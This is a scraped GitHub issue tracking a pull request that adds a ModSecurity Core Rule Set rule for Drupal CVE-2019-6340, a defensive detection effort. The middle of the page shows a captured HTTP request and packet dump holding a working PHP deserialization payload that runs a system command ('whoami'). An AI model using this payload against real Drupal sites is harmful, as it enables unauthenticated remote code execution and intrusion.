question-mark
Stuck on an issue?

Lightrun Answers was designed to reduce the constant googling that comes with debugging 3rd party libraries. It collects links to all the places you might be looking at while hunting down a tough bug.

And, if you’re still stuck at the end, we’re happy to hop on a call to see how we can help out.

adding rule for Drupal CVE-2019-6340

See original GitHub issue

_Issue for tracking original pull request created by user d1vious on date 2019-03-02 02:12:41. Link to original PR: https://github.com/SpiderLabs/owasp-modsecurity-crs/pull/1315._

HEAD is: 8b58c08d3cc266cfdb83c6776b6abbd21aba6d40 BASE is: f060b4369090db0e1c1341870e7e68b5bc40efda Used the following modified POC tool to test it https://gist.github.com/d1vious/9d798d4f50d6d887f1babcb82f5e3559 still need to build a unit test for it. Here an example payload from the attack

GET /node/3?_format=hal_json HTTP/1.1
Host: 192.168.86.76
User-Agent: python-requests/2.18.4
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/hal+json
Content-Length: 583


20:18:28.762332 IP 192.168.86.77.37584 > 192.168.86.76.80: Flags [P.], seq 225:808, ack 1, win 229, options [nop,nop,TS val 615012830 ecr 1128184318], length 583: HTTP
E..{ev@.@.....VM..VL...PO.. ..rB....N>.....
$.Y.C>..{"link": [{"value": "link", "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:18:\"echo ---- & whoami\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"}], "_links": {"type": {"href": "http://192.168.86.76/rest/type/shortcut/default"}}}

And the matching logs in JSON https://jsoneditoronline.org/?id=8e756fa3f4e34b20b13756d04df78690

Issue Analytics

  • State:closed
  • Created 3 years ago
  • Comments:5 (3 by maintainers)

github_iconTop GitHub Comments

1reaction
theMiddleBluecommented, Mar 20, 2021

still active, please keep open

0reactions
github-actions[bot]commented, Oct 10, 2021

This issue has been open 120 days with no activity. Remove the stale label or comment, or this will be closed in 14 days

Read more comments on GitHub >

github_iconTop Results From Across the Web

Drupal Core Remote Code Execution Vulnerability: CVE-2019 ...
CVE-2019–6340 is an unauthenticated remote code execution flaw in Drupal 8's REST API module, which affects websites with Drupal REST API ...
Read more >
Drupal Vulnerability Can Be Exploited for RCE Attacks
The content management framework Drupal recently fixed a vulnerability (CVE-2019-6340) in their core software, identified as SA-CORE-2019-003.
Read more >
Creating rules | Basic usage - Drupal
Access the "Rules" tab at the Business Rules page and click on "Add Rule" button. Then select the appropriated Event type and click...
Read more >
Cve 2019 6340 drupal : r/immersivelabs - Reddit
Cve 2019 6340 drupal. Hi I have answered q2 and got the token. But can't get q1. What is the password Drupal uses...
Read more >
Critical Drupal Vulnerability Allows Remote Code Execution
Updates released for the Drupal CMS patch a “highly critical” vulnerability that can be exploited for remote code execution (CVE-2019-6340).
Read more >

github_iconTop Related Medium Post

No results found

github_iconTop Related StackOverflow Question

No results found

github_iconTroubleshoot Live Code

Lightrun enables developers to add logs, metrics and snapshots to live code - no restarts or redeploys required.
Start Free

github_iconTop Related Reddit Thread

No results found

github_iconTop Related Hackernoon Post

No results found

github_iconTop Related Tweet

No results found

github_iconTop Related Dev.to Post

No results found

github_iconTop Related Hashnode Post

No results found